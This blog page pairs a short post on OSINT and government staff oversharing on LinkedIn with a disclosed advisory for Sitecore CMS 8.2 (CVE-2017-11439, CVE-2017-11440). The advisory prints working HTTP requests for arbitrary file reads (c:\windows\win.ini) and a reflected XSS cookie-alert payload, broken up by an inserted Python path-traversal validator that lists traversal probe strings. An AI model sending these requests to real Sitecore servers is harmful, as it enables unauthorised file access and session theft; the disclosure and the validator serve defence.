The ICWATCH, contains public database of mainly LinkedIn profiles of people in the United States government employees. Though the website is publicly known. It was quite astonishing to see how much information people have posted on their Linkedin accounts. It makes sense if someone is in sales or normal private sector job, but giving so much information and revealing what the person does, for intelligence community is, well not advised, in my opinion.

Back to the point, open-source intelligence (OSINT) is completely legal and any person/agency can easily gather information about anyone without committing a crime. I usually talk about advertisers, malicious hackers, social engineers etc, who use this to take advantage of the information collected and harm innocent users. People should keep in mind that tracking people across multiple social networking platforms is a trivial job nowadays, for a skilled hacker.

It is very important, not to disclose personal information on the internet. Especially social networks like Linkedin, Facebook, etc. Sharing personal stuff is never a bad thing, but people should be smart about what they share. If you are working for the government, there is no need of writing everything about what you do, on your Linkedin profile.

Peace!

Sitecore CMS v 8.2, cross site scripting & arbitrary file access

Hi folks,

Multiple vulnerabilities were found in Sitecore version 8.2, which were reported to Sitecore on the 5th of May, 2017. A patch was released on the 27th of June, 2017. It is recommended to update the Sitecore CMS installation. The exploit is being made public after the patch has been released.

Exploit:[CVE-2017-11439, CVE-2017-11440]

Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net

Disclaimer: Everything mentioned below is for educational purposes. The vulnerability details are mentioned as is. I would not be held responsible for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. They include two instances of arbitrary file access and one instance of reflected cross-site scripting.

1: Arbitrary file access:

– Description:

The vulnerability lies in tools which can be accessed by the administrator user. It exists because the application performs no bounds check for absolute paths: if an absolute path is provided to the vulnerable URL, it reads that path and shows the contents of the requested file.

– Exploit:
1. Once authenticated as the administrator, perform a GET request to the following URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator, perform a POST request to the following URL:

POST /sitecore/admin/LinqScratchPad.aspx HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= <OMITTED> &__VIEWSTATEGENERATOR= <OMITTED> &__EVENTVALIDATION= <OMITTED> &LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%5Cwin.ini&Fetch=
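The bounds check these two handlers lacked, as an added example that is not Sitecore's code: a file parameter is only honoured when it resolves to something inside the directory the application legitimately serves from. The base directory is hypothetical; the hostile inputs are the advisory's own c:\windows\win.ini plus constructed variants of the ways such a parameter is usually varied (forward slashes, drive-relative paths, UNC paths, ..\ and ../ traversal).

```python
"""Bounding a file parameter to one directory.

Added example (not Sitecore's code). The base directory is whatever the
application would legitimately serve from; PROBES holds the advisory's own
payload plus constructed variants, with the verdict a safe handler must give.
"""
from pathlib import Path, PurePosixPath, PureWindowsPath


def resolve_within(base, user_path):
    """Return the resolved path of user_path under base, or None if it escapes.

    Step 1 rejects anything absolute or drive-qualified under either OS
    convention (C:\\..., /etc/..., \\\\server\\share, C:relative), because the
    vulnerable handlers opened an absolute path exactly as given.
    Step 2 normalises '..' and symlinks and confirms the result still lies
    inside base, which catches traversal written as ..\\..\\ or ../../ .
    The file need not exist; the caller decides what a missing file means.
    """
    win, posix = PureWindowsPath(user_path), PurePosixPath(user_path)
    if win.is_absolute() or posix.is_absolute() or win.drive:
        return None
    root = Path(base).resolve()
    candidate = (root / user_path.replace("\\", "/")).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:                  # resolved outside the base directory
        return None
    return candidate


def is_allowed(base, user_path):
    """Boolean form of resolve_within for use in a request handler."""
    return resolve_within(base, user_path) is not None


# Constructed probes: the advisory's payload and its usual variations.
PROBES = {
    r"c:\windows\win.ini": False,            # from the advisory
    "c:/windows/win.ini": False,
    r"c:win.ini": False,                     # drive-relative, still leaves base
    "/etc/passwd": False,
    r"..\..\windows\win.ini": False,
    "../../etc/passwd": False,
    r"\\server\share\secret.txt": False,     # UNC path
    "layouts/page.xml": True,
    r"layouts\page.xml": True,
    "layouts/../layouts/page.xml": True,     # '..' that stays inside is fine
}


def check_probes(base="/tmp/sitecore_webroot_example"):
    """Return {probe: verdict} for the table above (base is hypothetical)."""
    return {probe: is_allowed(base, probe) for probe in PROBES}


if __name__ == "__main__":
    for probe, verdict in check_probes().items():
        print(f"{'ALLOW' if verdict else 'DENY '} {probe}")
```

Note that the check resolves symlinks before comparing, so a link planted inside the web root that points outside it is also refused; a plain string-prefix comparison on the unresolved path would not catch that.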

 

2. Reflected Cross-site Scripting:
– Description:
The application does not sanitize the user input, which allows a normal authenticated user to exploit this vulnerability.

– Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A// <OMITTED> /sitecore/shell/Applications/Tools/Run&__CSRFTOKEN= <OMITTED> &__VIEWSTATE= <OMITTED> &__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(document.cookie)%3B%22%3E%3C%2Fiframe%3E

++++++++++++++++++++++++++++++++++++++++++++++++++++

Time-Line:

  • Initial inquiry – May 5, 2017
  • Vulnerability advisory submission – May 5, 2017
  • Patch release – June 27, 2017
  • Publicly released – July 3, 2017